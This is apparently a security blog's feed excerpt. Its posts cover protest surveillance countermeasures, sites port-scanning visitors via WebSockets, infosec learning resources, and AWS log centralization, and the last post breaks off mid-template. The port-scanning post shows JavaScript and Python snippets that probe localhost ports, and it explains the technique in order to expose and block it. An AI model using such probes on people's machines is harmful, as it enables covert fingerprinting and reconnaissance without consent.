Here, I have tried to collect examples of governmental use of technologies to monitor and disrupt movements in repressive and democratic countries alike.</p><p>Modern anti-protester tactics include many things: cell phone monitoring, communications disruptions, social media blocking, social media monitoring, and using cellular records to identify, arrest, and intimidate organizers.</p><p>With protests ongoing in the US and globally, I wanted to share tactics that I have been informed of or observed, as well as some counter tactics that protesters can adopt to attempt to limit government surveillance and interference.</p><p>Use your best judgement when considering tactics and counter measures. Be safe out there, and keep fighting for your rights and freedoms!</p><h2 id="stingray-cellphone-monitoring-disruption">Stingray Cellphone Monitoring &amp; Disruption</h2><p>A <a href="https://en.wikipedia.org/wiki/Stingray_phone_tracker?ref=nullsweep.com">stingray</a> is a device that mimics a cell tower, and can be used to disrupt cellular service, track phone locations, monitor communications (listen in to phone calls), and retrieve unique phone identifiers (IMEI) from devices.</p><p>Stingrays should be considered very dangerous to any protest movement, as they can identify all cellphones in an area, along with the nearly exact location of each individual over time (by asking the device for a list of towers and signal strengths, a user can be fully triangulated).</p><p>These can be mounted on a flying drone or a police car, and have been in confirmed use in the US since 2006.</p><p><u><strong>Countermeasures</strong></u>: Unfortunately, stingrays are not easy to overcome without also disabling your phone. Here are a few things you can do, in rough order of simplicity and effectiveness:</p><ul><li>Put your phone on airplane mode. 
Unfortunately, this will render other safety precautions outlined below impossible, so consider carefully.</li><li>Configure your phone to use only the latest network types (4G+), since many stingrays depend on older standards, especially 2G. This may not be possible in all cases (<a href="https://oaklandmofo.com/blog/block-stringray-devices?ref=nullsweep.com">Disabling 2G in Android</a>). On iOS, you may find something in carrier settings, but I don&apos;t know of a way to fully disable forced 2G downgrade attacks.</li><li>Use burner phones (using a separate SIM is not enough, as the IMEI will not change, though you could attempt to rotate all identifiers).</li><li>Try downloading anti-stingray apps, but it <a href="https://www.wired.com/story/stingray-detector-apps/?ref=nullsweep.com">appears they are unlikely to work</a>.</li><li>Work with locals to set up mesh wifi networks, using apps like <a href="https://bridgefy.me/?ref=nullsweep.com">bridgefy</a> along with disabling wireless.</li></ul><h2 id="predator-surveillance-drone-ring-cameras">Predator Surveillance Drone &amp; Ring Cameras</h2><p>The Predator is used to surveil large geographic areas. From a <a href="https://www.extremetech.com/extreme/146909-darpa-shows-off-1-8-gigapixel-surveillance-drone-can-spot-a-terrorist-from-20000-feet?ref=nullsweep.com">2013 showcase</a>: a &quot;1.8-gigapixel video surveillance platform that can resolve details as small as six inches from an altitude of 20,000 feet (6km)&quot;. 
They use multiple cameras for various forms of imaging, and a single drone can monitor an entire city.</p><p>A Predator <a href="https://www.vox.com/recode/2020/5/29/21274828/drone-minneapolis-protests-predator-surveillance-police?ref=nullsweep.com">was spotted</a> flying over the Minneapolis protests.</p><p>In addition, many neighborhoods have <a href="https://www.theguardian.com/technology/2019/aug/29/ring-amazon-police-partnership-social-media-neighbor?ref=nullsweep.com">Ring cameras</a> installed, allowing police to view video feeds from doorsteps.</p><p>The main concern is mass use of video surveillance alongside facial recognition to identify large numbers of protestors. I don&apos;t have confirmation, but I think it&apos;s likely the drone resolution is still too low for facial recognition on the ground.</p><p><strong><u>Countermeasures</u></strong>: It&apos;s unlikely that either of these tools can provide clear enough photos for facial recognition in protest conditions. If possible, wear masks and clothing that help prevent facial recognition. Other forms of identification are also possible, and harder to prevent, such as <a href="http://jafari.tamu.edu/wp-content/uploads/2015/12/Anuradha_HealthNet08.pdf?ref=nullsweep.com">gait analysis</a>.</p><h2 id="disinformation-campaigns-psyops">Disinformation Campaigns &amp; PsyOps</h2><p>These campaigns are not necessarily run by the local police, but use disinformation to discourage gatherings, or to create violent conflict between groups based on false information. This may be as simple as users purposely posting incorrect meeting times and places to divide groups, or as complicated as generating false documents and events to create real news stories. 
</p><p>Interesting examples from the current protest include false claims that <a href="https://www.nbcnews.com/tech/social-media/klamath-falls-oregon-victory-declared-over-antifa-which-never-showed-n1226681?ref=nullsweep.com">Antifa is invading a town</a> (leading to the police notifying the military, leading to an official statement and hundreds of armed counter protestors) and <a href="https://www.theguardian.com/us-news/2020/jun/05/buffalo-police-officers-suspended-for-pushing-75-year-old-to-ground-during-protests?ref=nullsweep.com">police pushing down an old man, then falsely claiming he had tripped</a>.</p><p><strong><u>Countermeasures</u></strong>: It is generally easy to spot disinformation campaigns when other groups are targeted, but much harder to spot when disinformation aligns well with your world view and knowledge. Try not to fall for disinformation and document the truth to counter it in others.</p><ul><li>Always be vigilant and skeptical of information shared. Try to find source documents instead of third party write ups, edited video, or opinion pieces.</li><li>Document things on the ground. This can be as powerful as photos and video, or as simple as writing down notes with date/time stamps and descriptions.</li><li>Learn how to spot disinformation, and teach those around you.</li></ul><h2 id="social-media-spying">Social Media Spying</h2><p>Police have been known to monitor social media - <a href="https://www.washingtonpost.com/news/morning-mix/wp/2018/08/23/memphis-police-used-fake-facebook-account-to-monitor-black-lives-matter-trial-reveals/?ref=nullsweep.com">fake profiles / moles</a> and automated social media analysis are regularly used. In 2016, it was heavily reported that police were using automated tools to identify, track, and create dossiers on Ferguson protests. 
(<a href="https://medium.com/@ACLU_NorCal/police-use-of-social-media-surveillance-software-is-escalating-and-activists-are-in-the-digital-d29d8f89c48?ref=nullsweep.com#.fowkro6dy">ACLU research</a>, <a href="https://www.brennancenter.org/our-work/research-reports/map-social-media-monitoring-police-departments-cities-and-counties?ref=nullsweep.com">Brennan Center studies</a>). These were often marketed to police departments as a way to &quot;stay one step ahead of the rioters&quot;.</p><p>Geofeedia, the company most discussed in these articles, had some access revoked due to this reporting. However there are many companies that operate in this space, so consider this issue ongoing.</p><p><strong><u>Countermeasures</u></strong>: There is likely little to be done. The trade off between getting a particular message out, planning, and anonymity is a difficult one. If possible, consider the following:</p><ul><li>Create social media aliases for political activism unrelated to your real name. Companies like Facebook won&apos;t be fooled by this, but tools like geofeedia and moles will be. This works well for individuals who want to follow and attend events anonymously, less so for organizers or message amplifiers.</li><li>Leverage private, encrypted communications systems whenever possible. I recommend <a href="https://www.signal.org/?ref=nullsweep.com">signal</a>.</li></ul><h2 id="arrest-confiscate">Arrest &amp; Confiscate</h2><p>Police have been seen arresting and holding individuals overnight without allowing a phone call. 
Additionally, if arrested while filming, your device may be confiscated or destroyed, and it can take some time to have it returned.</p><p><strong><u>Countermeasures</u></strong>: Ensure that video you take is immediately saved off of your phone, and your device is set up to automatically notify others of your arrest.</p><ul><li>Use the <a href="https://www.aclu.org/issues/criminal-law-reform/reforming-police/aclu-apps-record-police-conduct?ref=nullsweep.com">ACLU mobile justice</a> app for your state to record police misconduct. This app claims to immediately upload the video. Facebook livestream and similar services are also a good choice.</li><li>Recent reports of protester arrests allege that they are sometimes held overnight without access to their phone or a call. Plan ahead and use apps like <a href="https://kitestring.io/?ref=nullsweep.com">KiteString</a> or <a href="https://support.apple.com/en-us/HT210514?ref=nullsweep.com">Find my Friends</a> to allow others to know if you are arrested.</li><li>This is a good article on <a href="https://www.theverge.com/21276979/phone-protest-demonstration-activism-digital-how-to-security-privacy?ref=nullsweep.com">securing your phone</a> before a protest.</li></ul><h2 id="conclusions">Conclusions</h2><p>Surveillance is difficult or impossible to avoid when planning or participating in a protest. The best way to ensure that surveillance is limited is to never build capabilities against citizens in the first place, and to enforce strict controls and punishments against agents and organizations who do so anyway.</p><p>Support organizations who fight this fight every day. 
In the US, this includes the <a href="https://www.eff.org/?ref=nullsweep.com">EFF</a>, <a href="https://www.aclu.org/?ref=nullsweep.com">ACLU</a> and <a href="https://www.freedomworks.org/?ref=nullsweep.com">FreedomWorks</a>.</p>]]></content:encoded></item><item><title><![CDATA[Why is This Website Port Scanning me?]]></title><description><![CDATA[Investigation of the practice of port scanning site visitors for fingerprinting and tracking.]]></description><link>https://nullsweep.com/why-is-this-website-port-scanning-me/</link><guid isPermaLink="false">5ec42ef0c049fc234ea58e64</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 19 May 2020 23:43:00 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/05/ebay_port_scan-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/05/ebay_port_scan-1.png" alt="Why is This Website Port Scanning me?"><p>Recently, I was tipped off about certain sites performing localhost port scans against visitors, presumably as part of user fingerprinting and tracking, or bot detection. This didn&apos;t sit well with me, so I went about investigating the practice, and it seems many sites are port scanning visitors for dubious reasons.</p><h2 id="a-brief-port-scanning-primer">A Brief Port Scanning Primer</h2><p>Port scanning is an adversarial technique frequently used by penetration testers and hackers to scan internet-facing machines and determine what applications or services are listening on the network, usually so that specific attacks can be carried out. It&apos;s common for security software to detect active port scans and flag them as potential abuse.</p><p>Most home routers don&apos;t have any open ports, so scanning an internet user&apos;s IP address is unlikely to return any meaningful data. 
However, many users run software on their computer that listens on ports for various reasons - online gaming, media sharing, and remote connections are just a few things that consumers might install on a home PC.</p><p>A Port scan can give a website information about what software you are running. Many ports have a well defined set of services that use them, so a list 
of open ports gives a pretty good view of running applications. For instance, Steam (a gaming store and platform) is known to run on port 27036, so a scanner seeing that port open could have reasonable confidence that the user also had Steam open while visiting the web site. </p><h2 id="watching-ebay-port-scan-my-computer">Watching Ebay Port Scan My Computer</h2><p>In the past I have worked on security products that specifically worried about port scanning from employee web browsers. Attack frameworks like <a href="https://beefproject.com/?ref=nullsweep.com">BeEF</a> include port scanning features, which can be used to compromise user machines or other network devices. So, I wanted to be able to alert on any port scanning on machines as a potential compromise, and a site scanning localhost might trip those alerts.</p><p>On the other hand, it&apos;s <a href="https://www.theregister.co.uk/2018/08/07/halifax_bank_ports_scans/?ref=nullsweep.com">been reported</a> a few times in the past that banks sometimes port scan visitors, and I have heard ThreatMetrix offers this as a customer malware detection check. </p><p>I was given the example of ebay as a site that includes port scanning, but when I initially navigated there I didn&apos;t see any suspicious behavior. I thought they might use some heuristics to determine who to scan, so I tried a few different browsers and spoofed settings, without any luck.</p><p>I thought it might be because I run Linux, so I created a new Windows VM and sure enough, I saw the port scan occurring in the browser tools from the ebay home page:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/05/ebay_port_scan.png" class="kg-image" alt="Why is This Website Port Scanning me?" 
loading="lazy"><figcaption>Ebay port scan</figcaption></figure><p>Looking at the list of ports they are scanning, they appear to be looking for VNC services running on the host, which is the same thing that was reported for bank sites. I marked out the ports and what they are known for (with a few blanks for ones I am unfamiliar with):</p><ul><li>5900: VNC </li><li>5901: VNC port 2 </li><li>5902: VNC port 3 </li><li>5903: VNC port 4 </li><li>5279: </li><li>3389: Windows remote desktop / RDP </li><li>5931: Ammy Admin remote desktop </li><li>5939: &#xA0;</li><li>5944: </li><li>5950: WinVNC &#xA0;</li><li>6039: X window system </li><li>6040: X window system </li><li>63333: TrippLite power alert UPS </li><li>7070: RealAudio</li></ul><p>VNC is sometimes run as part of botnets or viruses as a way to remotely log into a user&apos;s computer. There are several malware services that leverage VNC for these purposes. However, it is also a valid tool used by administrators for remote access to machines, or by some end user support software, so the presence of VNC is a poor indicator of malware.</p><p>Furthermore, when I installed and ran a VNC server, I didn&apos;t detect any difference in site behavior - so why is it looking for it?</p><h2 id="how-port-scanning-with-websockets-works">How Port Scanning with WebSockets Works</h2><p>WebSockets are intended to allow a site to create bi-directional communication like traditional network sockets. This allows sites to periodically send information to a client browser without user interaction or front end polling, which is a win for usability.</p><p>When a web socket is configured, it specifies a destination host and port, which do not have to be the same domain that the script is served from. To do a port scan, the script only has to specify a private IP address (like localhost) and the port it wishes to scan. 
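Outside the browser, the open/closed inference such a script makes can be approximated with plain TCP connect attempts. This is only an illustrative Python sketch of the concept (the `port_appears_open` helper is my own), not the actual JavaScript any site ships:

```python
import socket

def port_appears_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Try a TCP handshake: success means something is listening;
    an immediate refusal or a timeout means it is not reachable."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            return s.connect_ex((host, port)) == 0
        except OSError:
            return False

# Check a few of the remote-desktop ports a fingerprinting script targets:
for port in (5900, 3389, 5931):
    print(port, port_appears_open("127.0.0.1", port))
```

A browser script has no raw sockets, which is why it falls back to WebSocket error messages and timing, as described next.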
</p><p>WebSockets only speak HTTP though, so unless the host and port being scanned are a web socket server, the connection won&apos;t succeed. In order to get around this, we can use connection timing to determine whether the port is open or not. Ports that are open take longer in the browser, because there is a TLS negotiation step. </p><p>You also might get different error messages. If you have python installed, try running the following to create a local web server running on port 8080:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">python3 -m http.server 8080
</code></pre>
<!--kg-card-end: markdown--><p>Now, open your browser developer console (usually options -&gt; Web Developer -&gt; Console) and type some JavaScript in directly. Here is what I see when I do it in chrome:</p><!--kg-card-begin: markdown--><pre><code class="language-JavaScript">&gt; var s = new WebSocket(&quot;ws://127.0.0.1:8080&quot;)
&lt; undefined
VM1131:1 WebSocket connection to &apos;ws://127.0.0.1:8080/&apos; failed: Error during WebSocket handshake: Unexpected response code: 200
(anonymous) @ VM1131:1
&gt;var s = new WebSocket(&quot;ws://127.0.0.1:8081&quot;)
&lt;undefined
VM1168:1 WebSocket connection to &apos;ws://127.0.0.1:8081/&apos; failed: Error in connection establishment: net::ERR_CONNECTION_REFUSED
</code></pre>
<!--kg-card-end: markdown--><p>Between error message introspection and timing attacks, a site can have a pretty good idea of whether a given port is open.</p><h2 id="port-scanning-is-malicious">Port Scanning is Malicious</h2><p>Whether the port scan is used as part of an infection or as part of e-commerce or bank &quot;security checks&quot;, it is clearly malicious behavior and may fall on the wrong side of the law.</p><p>If you observe this behavior, I encourage you to complain to the institution performing the scans, and install extensions that attempt to block this kind of behavior in your browser, generally by preventing these types of scripts from loading in the first place.</p><h1 id="prevent-this-kind-of-abuse">Prevent this kind of abuse</h1><p>When I initially wrote this article, I didn&apos;t have any good tools to recommend to block this kind of malicious action by a site. I was recently clued in to <a href="https://github.com/ACK-J/Port_Authority?ref=nullsweep.com">Port Authority</a>, a Firefox extension that looks like a great way to block this and other nasty techniques that remove some agency from the user. 
Check it out!</p>]]></content:encoded></item><item><title><![CDATA[My Favorite InfoSec Learning Resources]]></title><description><![CDATA[A structured list of security learning resources.]]></description><link>https://nullsweep.com/my-favorite-infosec-learning-resources/</link><guid isPermaLink="false">5e9d7b7bc049fc234ea58cc2</guid><category><![CDATA[Career]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Fri, 24 Apr 2020 10:37:24 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1569585723140-efb9daaa18f3?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1569585723140-efb9daaa18f3?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="My Favorite InfoSec Learning Resources"><p>I am always learning new things about security, and sometimes mentor junior team members on where they can learn new skills. I find that a successful practitioner is one who not only spends time understanding the security concerns, tools, and skill sets, but also the underlying technologies to be protected as a normal user would. </p><p>This may mean spending time understanding the life of a sysadmin for OS protection, programming for securing development, cloud administration, etc.</p><p>I am not an expert in all these areas, but I love to broaden my view. 
Here, I wanted to share the learning resources I find myself returning to when I need a refresher on something, or assets I suggest a colleague leverage to skill up quickly.</p><h2 id="security-books">Security Books</h2><p><a href="https://www.amazon.com/gp/product/1593275641/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1593275641&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=0d6d01cac0037da53e02d9570224a213&amp;ref=nullsweep.com">Penetration Testing</a> by Georgia Weidman. This is great for everyone in the field, pen tester or not, because of how Georgia lays out the tools and processes a pen tester can use, along with common vulnerability findings.</p><p><a href="https://www.manning.com/books/securing-devops?ref=nullsweep.com">Securing Devops</a> by Julien Vehent. This book took me by surprise with how good it is. The best book I have read for understanding the many facets of real security programs in modern companies - devops, cloud security, log centralization, and more. It&apos;s also probably the quickest read on this list.</p><p><a href="https://www.amazon.com/gp/product/1593275099/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1593275099&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=cf249c1e28b4261923a1f1adeb55cc10&amp;ref=nullsweep.com">The Practice of Network Security Monitoring</a> by Richard Bejtlich. I love this book from a defensive perspective, as it teaches all about setting up network monitoring and detecting and reacting to intrusions. I am still working my way through it.</p><p><a href="https://www.amazon.com/gp/product/0321444426/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0321444426&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=401705f28cbb188e4abf81a2fe309717&amp;ref=nullsweep.com">The Art of Software Security Assessment</a> by John McDonald, Mark Dowd, and Justin Schuh. 
This book is a beast to get through, but is the seminal text on assessing a piece of software from a security perspective. It is thorough and detailed, walking through proper processes, strategies for tackling an audit, and a huge variety of vulnerabilities and how they present.</p><p><a href="https://www.amazon.com/gp/product/1260108414/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1260108414&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=d59a4f6097375169cf907677c5e263f2&amp;ref=nullsweep.com">Gray Hat Hacking</a> by multiple authors. This is a great second security book, after Penetration Testing, for getting your hands dirtier. I find the examples tend to run a little light on the theory, requiring follow up research and reading, but that&apos;s not a bad thing. This book walks through a little of everything: fuzzing and finding 0days, web app pen testing, running scanners, network attacks, OS attacks, and more.</p><p><a href="https://www.amazon.com/gp/product/169903530X/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=169903530X&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=638eb1dc71c2fc32995244611f368d4f&amp;ref=nullsweep.com">Open Source Intelligence Techniques</a> by <a href="https://inteltechniques.com/?ref=nullsweep.com">Michael Bazzell</a>. This walks through many ways to find information online. Some of it is basic (Google hacking and leveraging search well), and some of it is advanced. The book is focused on individuals, but the concepts can be applied to anything. The flip side of this is an excellent guide to privacy. His website is a great resource for both as well.</p><p><a href="https://www.amazon.com/gp/product/1250010454/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1250010454&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=7f578af4b053a24a1b7753c26c7e21e0&amp;ref=nullsweep.com">How to be Invisible</a> by J.J. Luna. 
This may not be strictly a security professional&apos;s book, but it does outline a number of ways to protect your assets, privacy, and security both online and off, using a variety of legal tricks and security practices. </p><p><a href="https://www.amazon.com/gp/product/1118026470/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1118026470&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=af41627e39ab425546e05be8c13cda98&amp;ref=nullsweep.com">The Web Application Hacker&apos;s Handbook</a> by Dafydd Stuttard. I was a little conflicted putting this here because the book has a lot of proprietary tool stuff, though I still think it is the best book to learn classes of web application vulnerabilities and how to find them. </p><h2 id="capture-the-flag-hands-on">Capture the Flag / Hands On</h2><p>After reading theory, and perhaps running specific examples or labs, I like to practice in slightly more open environments. Here are the ones I have enjoyed the best, keeping in mind that there are many more available than I will ever have time to try. If something sounds interesting - try it!</p><p><a href="https://overthewire.org/wargames/?ref=nullsweep.com">Over the wire</a> - Natas is great for web pen testing, and the rest for coming up to speed on things like buffer overflow and memory corruption. I haven&apos;t completed everything on the site, but I always learned a lot. All the challenges are free.</p><p><a href="https://www.pentesterlab.com/">Pentester lab</a> - an excellent site for learning, with a structured approach and courses. Unfortunately, it&apos;s a modest investment on an ongoing basis.</p><p><a href="https://www.vulnhub.com/?ref=nullsweep.com">Vulnhub</a> - Download lots of (free!) vulnerable VMs. 
If you are just starting out, try out the <a href="https://www.vulnhub.com/?q=kioptrix&amp;sort=date-des&amp;ref=nullsweep.com">Kioptrix</a> series (1-5), <a href="https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/?ref=nullsweep.com">Minotaur</a>, <a href="https://www.vulnhub.com/entry/pwnlab-init,158/?ref=nullsweep.com">pwnlab</a>, <a href="https://www.vulnhub.com/entry/stapler-1,150/?ref=nullsweep.com">stapler</a>, and <a href="https://www.vulnhub.com/entry/vulnos-2,147/?ref=nullsweep.com">VulnOS</a>.</p><p><a href="https://www.hackthebox.eu/?ref=nullsweep.com">Hack the Box</a> - One of my favorite sites. VPN into their network and have fun! There is a small hacking challenge to get an account. They have a Pro version, but the free one is plenty for part-time learning.</p><p><a href="http://www.fuzzysecurity.com/tutorials.html?ref=nullsweep.com">Fuzzy Security Tutorials</a> - More a mix of tutorials, VM exploit walkthroughs, and overviews of concepts - this site has many interesting resources for learning aspects of hacking.</p><p>Here are a few good cheat sheets: enumerate <a href="http://www.0daysecurity.com/penetration-testing/enumeration.html?ref=nullsweep.com">network services</a>, <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?ref=nullsweep.com">reverse shells</a>, and one for <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/?ref=nullsweep.com">privilege escalation</a> (it&apos;s a little old, but still relevant - the methodology is what counts).</p><h2 id="programming">Programming</h2><p>I&apos;m a programmer by trade and only entered the security field later, so I am less versed in beginner resources. I first learned programming by picking up an introductory C++ text and working my way through it cover to cover, before entering college. I picked up some bad practices, and missed some important concepts doing it this way, so I usually recommend structured courses to start. 
</p><p>I recommend starting with Python if you are new to programming. It is easy to read compared to some languages, has relatively simple tooling, and is frequently used by the security community.</p><p><a href="https://www.udacity.com/school-of-programming?ref=nullsweep.com">Udacity programming track</a> - Start with <a href="https://www.udacity.com/course/introduction-to-python--ud1110?ref=nullsweep.com">Introduction to Programming</a>, and go on to <a href="https://www.udacity.com/course/design-of-computer-programs--cs212?ref=nullsweep.com">Design of Computer Programs</a>. The second one in particular is one of the best programming courses I have ever taken, including many university courses. Both of these should be free, but Udacity has many paid courses and I have always found the content good.</p><p><a href="https://podcasts.apple.com/us/podcast/developing-ios-11-apps-with-swift/id1315130780?ref=nullsweep.com">Developing iOS 11 apps with Swift</a> by Paul Hegarty if you want to learn iOS development or mobile more broadly. This is probably less helpful to security practitioners unless you are specifically working with mobile app development teams. This would be a very challenging first programming course, as he assumes the student is already familiar with most programming concepts (data structures &amp; OOP specifically). </p><p><a href="https://www.amazon.com/gp/product/0134190440/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0134190440&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=4df36b306d07dd4c6ad2c23ec3fe6193&amp;ref=nullsweep.com">The Go Programming Language</a> by Alan A. A. Donovan and Brian W. Kernighan. I prefer Go for command line tooling over python for a number of reasons. 
Mostly, I find that a compiled language removes all the local dependencies that Python comes with, and the golang compiler makes it easy to build for different systems.</p><h2 id="certifications-courses">Certifications &amp; Courses</h2><p>I really like structured learning. Unfortunately, I have not found many courses I can fully recommend. I have taken some great SANS courses, but can&apos;t recommend them due to their high cost, unless your company is paying. </p><p>The same is true for certifications. The two I think are most valuable overall are the CISSP (requires 5+ years experience) and the OSCP. Others may be a good investment depending on target jobs and employers, especially Security+.</p><p>With all of that, there are really only two things I can recommend, with the caveat that I personally have not completed either.</p><p><a href="https://www.offensive-security.com/pwk-oscp/?ref=nullsweep.com">Pen testing with Kali</a> by Offensive Security. This is the official OSCP preparation course, and is highly touted in the community. It starts at $1000, which is not very expensive considering other top-tier classes.</p><p><a href="https://www.pentesterlab.com/">Pentester lab</a> as I mentioned above. Their pro service has some excellent courses and hands-on exercises, and is a lot less investment to get started at $20/month.</p><h2 id="ongoing-reading-and-news">Ongoing Reading and News</h2><p>Often, I find I learn the most when I stumble across a newly discovered exploit or vulnerability, then take the time to research how it works. Most of the CTF challenges and formal training options will cover only a subset of real world attacks. Reading the news will broaden your understanding of attacks that need to be considered in production environments.</p><p>Additionally, attacks like encryption downgrade attacks, cache poisoning, or phishing are rarely well represented in training labs. 
Reading about real world attacks and defenses helps greatly in this regard. Here is a list of news and infosec sites worth following - there are too many to watch regularly, so pick the ones you like or use an RSS reader.</p><p><a href="https://www.bleepingcomputer.com/?ref=nullsweep.com">Bleeping Computer</a> - News about current attacks and breaches. Most articles aren&apos;t technically deep.</p><p><a href="https://www.reddit.com/r/netsec?ref=nullsweep.com">r/netsec</a> - a Reddit community discussing vulnerabilities, exploits, and tools. Great for learning.</p><p><a href="https://nakedsecurity.sophos.com/?ref=nullsweep.com">Naked Security by Sophos</a> - Another news site about current attack trends. </p><p><a href="https://krebsonsecurity.com/?ref=nullsweep.com">Krebs</a> - Great in-depth write-ups on security news, sometimes breaking news, and general security information.</p><p><a href="https://threatpost.com/?ref=nullsweep.com">ThreatPost</a> - yet another news site</p><p><a href="https://www.darkreading.com/?ref=nullsweep.com">Dark Reading</a> - another popular security news site</p><h2 id="conclusions">Conclusions</h2><p>There are tons of other learning resources out there. I didn&apos;t touch on many areas of importance such as networking, sysadmin, architecture, and cloud. Each of these is a domain of its own, and I learned them largely by doing and reading to solve problems in my day job.</p><p>My philosophy has been to learn continuously, and be curious. I investigate things I don&apos;t understand well, and prefer fundamental understanding over knowledge of edge cases. 
When given a choice of where to focus my time, I generally choose broader concepts, which apply to more situations, over specific exploits or vulnerabilities.</p><p>A good way to think about it: if I come across an exploit that takes advantage of something I don&apos;t fully understand, I will take the time to understand the underlying system and how it works, rather than focusing on the exploit. Later, I can come back to the exploit with a much deeper understanding of how it was found and exploited, as well as all exploits of a similar class.</p>]]></content:encoded></item><item><title><![CDATA[Centralized Security Logging in AWS]]></title><description><![CDATA[CloudFormation templates and walk-through to set up detailed security logging in multiple AWS accounts, centralized into a security account.]]></description><link>https://nullsweep.com/centralized-security-logging-in-aws/</link><guid isPermaLink="false">5e6a0692c049fc234ea58bc5</guid><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Technical Guides]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Wed, 18 Mar 2020 10:38:00 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws-1.png" alt="Centralized Security Logging in AWS"><p>When securing an AWS environment, one of the first tasks is <a href="https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-receive-logs-from-multiple-accounts.html?ref=nullsweep.com">configuring CloudTrail</a> and ensuring that logs from various accounts within an organization are shipped to a centralized AWS security account.</p><p>Frequently, however, there are other log sources that I will want to monitor across the environment. 
These are logs generated by custom services and applications that have some impact on security - web server logs, syslogs, various security product logs, etc.</p><p>When I first attempted to do this, it wasn&apos;t obvious from the documentation how to properly configure a system that could ingest from multiple accounts and data sources, and consolidate everything in one place.</p><p>In this article, I&apos;ll walk through the setup I finally landed on to capture those logs in CloudWatch, ingest them into a security account with Kinesis, and store them in an S3 bucket for future use. Some of the architecture choices are forced by AWS policy for cross account access (Kinesis).</p><p>A full setup would likely also include a life-cycle policy (storing older logs in something like Glacier), and integration with an SIEM or log visualization tool. I have used the Splunk S3 integration for SIEM integrations from this setup, and Kibana with ElasticSearch as a separate output from Kinesis for these purposes in the past.</p><p>If you haven&apos;t seen the security VPC setup, I cover that in the first article in this series, <a href="https://nullsweep.com/advanced-aws-security-architecture/">advanced AWS security architecture</a>.</p><p>Why would we want to set something like this up? It gives us a few key security benefits:</p><ul><li>Immutable logs from all assets in our infrastructure. Auditors, security analysts, and forensic investigators can have confidence that a compromised server does not mean compromised logs, even if an attacker takes over the root account of a VPC.</li><li>One place to search all log data in the event of an incident. 
</li><li>Single point to back up / archive for future potential needs, allowing storage cost optimizations.</li><li>One integration point for downstream security systems such as SIEM or visualization tools.</li></ul><h2 id="log-architecture">Log Architecture</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws.png" class="kg-image" alt="Centralized Security Logging in AWS" loading="lazy"><figcaption>Security Log Centralization Architecture for AWS</figcaption></figure><p>The setup in AWS is a little complicated, since our goal is to enable centralization from many application accounts to a single security account. </p><p>On the security side, we have a customer managed key (KMS) for encrypting everything end to end, with an S3 bucket as long term storage. To ingest and direct these logs, we need a Kinesis stream (to receive) and Kinesis Firehose (to direct to S3), along with some IAM roles and glue components.</p><p>On the application side, we need a smaller footprint: a subscription and a CloudWatch group to subscribe to. Any number of groups and/or subscriptions can be created here. The subscriptions also give us the capability of filtering logs to target only those we care about, such as webserver logs or specially crafted security logs from applications.</p><h1 id="cloudformation">CloudFormation</h1><p>I created two CloudFormation templates to provision all of this infrastructure. 
I&apos;ll walk through each major component here, or you can skip this part and go right to the <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure/tree/master/log_centralization?ref=nullsweep.com">full templates in github</a>.</p><h3 id="required-role-policy">Required role &amp; policy</h3><p>We&apos;ll need a service role in the security account, and a policy that gives the minimum access needed to each service to ensure they can all communicate.</p><p>This role uses namespacing to give access only to the resources required. In this case, prefixing the assets with the name &quot;secops-&quot;. In a real environment, you might use a unique ID from an asset system tied to an application.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  IngestionRole:
    Type: AWS::IAM::Role
    Properties:
      RoleName: security-log-writer
      Path: /
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Action: sts:AssumeRole
            Effect: Allow
